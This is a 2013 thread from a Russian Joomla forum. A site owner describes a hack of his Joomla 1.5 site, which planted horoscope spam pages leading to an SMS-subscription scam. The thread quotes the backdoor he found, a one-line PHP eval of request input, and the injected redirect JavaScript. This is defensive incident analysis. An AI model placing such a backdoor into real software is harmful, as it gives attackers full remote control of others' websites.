Новости Joomla

20 лет Joomla: Ринат Кажетов

20 лет Joomla: Ринат Кажетов.В 2025 году Joomla исполнилось 20 лет

В 2025 году Joomla исполнилось 20 лет. Вокруг неё сложилось большое интернациональное русскоязычное сообщество. На сайте нашего сообщества и на Хабре к юбилею были собраны интервью с его видными представителями. Сегодня мы читаем интервью с Ринатом Кажетовым (@rkazhet). Ринат - один из администраторов чата русскоязычного Joomla-сообщества, из Казахстана. Это человек, который всегда знает или найдёт нужную ссылку, пристально следит за новостями в мире Joomla, многое узнаёт первым и просто очень отзывчивый человек. Интервью с Ринатом провёл Евгений Сивоконь.

Читать интервью

0 Пользователей и 1 Гость просматривают эту тему.
  • 5 Ответов
  • 2059 Просмотров
*

Marv

  • Осваиваюсь на форуме
  • 26
  • 2 / 0
Взломали сайт
« : 20.03.2013, 22:34:18 »
Здравствуйте. Взломали старый проект на Joomla 1.5.15, обновился до 1.5.25. Возможно кто-то сталкивался: на сайт в папку libraries залили кучу страниц с гороскопами и в активный шаблон закинули ссылки и скрытый фрейм (в принципе, по стандарту). Все равно снова взломали. Думал, что ушел ftp, но в логах все чисто, только проверенные IP. Ума не приложу где искать дыру.

Из компонентов, которые не входят в дистрибутив самой Joomla: JoomFish 2.1.7 и Form2Content Lite 1.3.0. Из модулей: mod_junewsultra и mod_jflanguageselection. Все остальное - родное.

Заранее благодарен за советы.

p. s. С Joomla давно уже не работаю, так что вариант мигрировать на новую версию не подходит.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Взломали сайт
« Ответ #1 : 20.03.2013, 23:14:28 »
Советы стандартный- искать шелл, бекдор. Ну и обновиться до 1.5.26
*

Marv

  • Осваиваюсь на форуме
  • 26
  • 2 / 0
Re: Взломали сайт
« Ответ #2 : 21.03.2013, 10:40:14 »
Черт. Так и есть. Сравнил пофайлово свою Joomla и загруженную с Joomla.org.

/administrator/components/com_massmail/toolbar.massmail.php строка 14:

Код
if(isset($_GET['pa'])){$pa="sum";if($_REQUEST["pa"]==$pa)eval/*;*/(stripslashes($_REQUEST["co"]));die;}

Теперь ясно почему изменили только активный шаблон. Это ж полный доступ к бд и ядру, пичааль. Причем обновлялся заплатками, а они, естественно, этот файл не затрагивали. Полностью обновил все ядро на всякий случай. Осталось узнать как он туда попал.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Взломали сайт
« Ответ #3 : 21.03.2013, 11:26:09 »
Тогда проверь еще и папку /language
*

Marv

  • Осваиваюсь на форуме
  • 26
  • 2 / 0
Re: Взломали сайт
« Ответ #4 : 21.03.2013, 12:54:50 »
Вроде все проверил, в /language и /administrator/language чисто.

Мой сайт был в выдаче яндекса по ключевикам "гороскоп, составить гороском" чуть ли не в первой десятке. Вредоносные странички были сверстаны по всем сеоправилам, с адекватным HTML и дизайном. Я понимаю, что ботнет из зомби-сайтов (кстати в поисковике нашел кучу с такой же заразой), довольно быстро может поднять сам себя в выдаче. Но зачем?

Порыскал по таким сайтам, они перессылаются только на друг друга, и то не все, с некоторых даже нет внешних ссылок. Есть ссылка, которая с помощью javascript подсовывается пользователю, решившему таки составить себе гороскоп:

Код
<script language="JavaScript" type="text/javascript">
var _auth = false;
var SITE_URL = "http://_ссылка_на_сайт_злоумышленника_сломавшего_мой_сайт_/goroskop.html";

$("div.circle a.znak").click(function (){
$('#next_button').click(function(){
window.location.replace(SITE_URL+'?sid=7&tds-zodiak='+$(this).attr('zid'));
});
});
</script>

<a class="znak z12" id="z12" href="javascript:void(0);"><span>Козерог<small>(22.12—20.01)</small></span></a>

Перешел по предложенной ссылке, думал, что попаду на какой-нибудь дорвей. Ан нет, попал на сайт со всякими тестами, который действительно предлагал составить гороскоп за SMS. Конец немного предсказуем. Человек отправляет SMS, теряет ощутимую сумму, а владелец сайта получает деньги. Цитата с сайта (темными буквами на черном фоне, font-size: 10px, в HTML коде буквы заменены мнемониками):

Цитировать
Для получения доступа к сайту абонентам необходимо отправить ответное SMS сообщение на номер ... Стоимость SMS на номер... Стоимость подписки для абонентов Билайн: 20 руб. с НДС раз в день. Для остановки подписки необходимо отправить смс-сообщение с текстом STOP на номер...

Ок, теперь все кристально ясно. Злоумышленник взламывает сайт и размещает на нем данные страницы, в случае надобности организует ссылки на соседей, для того, что бы поднять их выше в выдаче поисковиков. Запрос по гороскопам не такой уж и редкий.

Доверчивый человек попадает на такую страницу (довольно презентабельную кстати). Жмет кнопку, его переадресует на сайт некоторой биржи, назовем ее так, где фиксируется кому именно зачислить деньги за этот переход (в ссылке есть айдишник). И сразу переадресуется на сайт с гороскопом. Причем для пользователя это выглядит как простой переход. Там-то уже, если он фатально доверчив, получает подписку на ненужный сервис, предупреждение о которой запрятано как только можно. И теряет раз в сутки по 20 рублей.

Вот ссылки на злоумышленников:
биржа - _grom2_ru_
сайт, который получает непосредственную прибыль - _luboidomen_ru _

Я не думал, что люди до сих пор ведутся на подобные разводы с SMS. Но, черт побери, мой сайт до сих пор бомбардируют запросы этих страниц из поисковиков. Бот яндекса пересканировал эти страницы уже дважды судя по логам. Кроме того, безумно много запросов, которые пытаются нашарить Wordpress:

Код
GET /wp-includes/js/swfupload/plugins/
GET /wp-includes/js/tinymce/plugins/paste/
GET /wp-includes/js/tinymce/plugins/media/

Вот такая история.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Взломали сайт
« Ответ #5 : 21.03.2013, 13:10:18 »
Да я со смарта писал.Нужно глубже в папках локализации /language/en-GB and ru-RU
Просто был недавно такой же шелл у клиента.Нашел в папке /language/en-GB, файл en-GB.php
с кодом шелл, далеко в стороне от якобы форматирования локализации
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3148
Последний ответ 31.03.2024, 16:14:32
от SeBun
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 2260
Последний ответ 05.11.2021, 21:47:31
от wishlight
Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 1136
Последний ответ 29.08.2020, 00:25:24
от cntrl
Безопасный вход на сайт Joomla и админка

Автор jm

Ответов: 9
Просмотров: 2281
Последний ответ 19.07.2020, 23:57:17
от wishlight
[Руководство] Как защитить сайт на версии 1.5 (не поддерживается разработчиками)

Автор flyingspook

Ответов: 13
Просмотров: 7858
Последний ответ 08.01.2020, 12:52:55
от winstrool